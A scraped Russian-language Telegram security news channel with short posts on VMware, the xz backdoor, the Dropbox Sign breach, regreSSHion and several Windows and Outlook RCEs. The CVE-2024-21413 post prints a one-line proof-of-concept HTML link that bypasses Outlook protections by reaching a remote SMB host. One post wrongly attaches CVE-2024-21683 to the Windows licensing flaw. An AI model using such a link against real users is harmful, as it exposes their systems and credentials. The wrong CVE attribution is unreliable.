Информационная опасность – Telegram
Информационная опасность
1.11K subscribers
183 photos
20 videos
7 files
86 links
Download Telegram
Nginx от Рамблера дедушки ушел, потом от F5 бабушки ушел...

https://mailman.nginx.org/pipermail/nginx-devel/2024-February/K5IC6VYO2PB7N4HRP2FUQIBIBCGP4WAU.html
12 февраля 2024 года компания Broadcom, владеющая VMware, прекратила распространение бесплатных версий VMware vSphere Hypervisor ESXi 7.x и 8.x. Всё.

https://kb.vmware.com/s/article/2107518

Бесплатных продуктов от VMware теперь нет.

Давно пора тем кто еще не - переезжать на Proxmox.
👍1
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413 . Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019.

Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.

Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.

<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>

PoC
Такие дела.

Купил в магазине маленький вибратор. На нем есть колпачок, который снимается и появляется USB-порт для зарядки. Получается флешка с вибратором.

Без раздумий подключил его к компьютеру для зарядки.

Открыл веб-браузер, и тут же загрузился файл. Не открывая никаких веб-страниц, 🛡malwarebytes отметил его как вредоносное ПО и остановил загрузку.

https://www.reddit.com/r/Malware/comments/1asn02v/malware_from_a_vibrator/
🔌Когда мы подключаемся к VPN, нужно понимать, что передаем всю информацию на устройстве тем, кто этот трафик обеспечивает. В эфире МК объяснил суть запрета на распространение информации о способах и методах обхода блокировок, который вступил в силу сегодня, 1 марта.
В Красном море перебиты четыре подводных телекоммуникационных кабеля из полутора десятков, соединяющих Европу, Азию и Африку; речь идет о линиях связи Asia–Africa–Europe 1 (AAE–1), Europe India Gateway, Seacom и TGN, на которые приходится 25 % трафика в регионе; пострадавшие маршруты являются важнейшими для передачи данных из Азии в Европу — HGC Global Communications Limited.
Backdoor в xz/liblzma (атака на цепочку поставок)

Ну и кто добавил вредонос ?
*
А ноги растут из 2021 года, когда был создан акк JiaT75 на гите.
JiaT75 делает коммит, заменяя Safe_fprint небезопасным вариантом, делая еще одну потенциальную дырку.
*
В 2022 году добавляет патч к xz и появляется еще один коммитер Jigar Kumar.
Вместе они парят голову Лассе Колину (разраб xz) и патч мерджится.
Ребятам стали доверять и выдали креды к репозиторию.
*
В 2023 контактная почта в Google oss-fuzz меняется на JiaT75, а не на Лассе Коллина.
И коммиты понеслись....
*
В 2024 году ребята меняю URL tukaani.org/xz/ на xz.tukaani.org/xz-utils/ который далее уводит на гит JiaT75. Отжали проект. Далее добавляются последнии коммиты уже с бэкдором и шлюхами
Как был взломан Dropbox Sign

Злоумышленники взломали учетную запись службы в бэкенде Sign, у которой были привилегии для выполнения различных действий в продакшн среде. Затем они использовали этот доступ для получения доступа к базе данных клиентов.

В ходе расследования выяснилось, что злоумышленники получили доступ к данным, включая информацию о клиентах: электронную почту, имена пользователей, номера телефонов и хэшированные пароли.

Кроме того, были скомпрометированы конфигурации, информация о настройках, и информация об аутентификации, например, API-ключи, OAuth-токены и данные о многофакторной аутентификации пользователей.

Dropbox Sign взломали и слили всю базу, включая секреты для TOTP. Sign — это сервис, через через который можно шарить и подписывать документы онлайн.
🔤🔤🔤🔤🔤🔤🔤🔤🔤🔤

Countries ranked by their World Cybercrime Index (WCI).

Данные, лежащие в основе индекса, были собраны в ходе опроса 92 ведущих экспертов по киберпреступности со всего мира, которые участвуют в сборе и расследованиях кибер-преступности. В ходе опроса эксперты рассмотрели пять основных категорий * киберпреступности, выдвинули страны, которые они считают наиболее значимыми источниками каждого из этих видов киберпреступности, а затем ранжировали каждую страну по влиянию, профессионализму, техническим навыкам ее киберпреступников.
Please open Telegram to view this post
VIEW IN TELEGRAM
Методика_оценки_показателя_состояния_ЗИ_и_безопасности_КИИ.pdf
178.2 KB
📣 Методика оценки показателя состояния защиты информации и обеспечения безопасности объектов КИИ
Please open Telegram to view this post
VIEW IN TELEGRAM
😈Хакер под псевдонимом «Cvsp» на одном киберпреступных форумов заявил о продаже RCE-эксплойта для zero-day уязвимости в Microsoft Outlook.

По данным хакера, данный эксплойт позволяет удалённое выполнение кода и гарантированно работает на Microsoft Office 2016, 2019, LTSC 2021 и Microsoft 365 Apps for Enterprise.

Проведённые тесты якобы показали 100% успеха, что свидетельствует о высокой надёжности и эффективности эксплойта в компрометации уязвимых систем.

Если это не скам, то цена вполне оправдана, учитывая количество потенциальных жертв.
Please open Telegram to view this post
VIEW IN TELEGRAM
2
От такие дела, малята )
An Unauthenticated Remote Code Execution (RCE) vulnerability in OpenSSH’s server (sshd) on glibc-based Linux systems.

Компания Qualys выявила критическую уязвимость (CVE-2024-6387) в OpenSSH, позволяющую добиться удалённого выполнения кода с правами root без прохождения аутентификации. Уязвимость, которая получила кодовое имя regreSSHion, проявляется в конфигурации по умолчанию начиная с версии OpenSSH 8.5 на системах со стандартной библиотекой Glibc.
🔥1
🔤2️⃣4️⃣🔤🔤🔤🔤🔤

Сумма всего, что Crowdstrike могла предотвратить, вероятно, меньше, чем ущерб, который они только что нанесли.
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-21683 0-click RCE

Затронуты версии от Win server 2000 до Win server 2025

Уязвимость в службе лицензирования удаленных рабочих столов Windows (RDL), в инет сейчас торчит 170 000 таких хостов.
Никогда такого не было и вот опять.

Microsoft предупредила пользователей о критической уязвимости TCP/IP, которая позволяет удалённое выполнение кода (RCE) на всех системах Windows с включенным по умолчанию протоколом IPv6.

Уязвимость CVE-2024-38063 (оценка CVSS: 9.8) связана с целочисленным переполнением (Integer Underflow) и может быть использована злоумышленниками для переполнения буфера и выполнения произвольного кода на уязвимых системах Windows 10, Windows 11 и Windows Server. По импакту это аналог знаменитой MS-17010.
🤯2😁1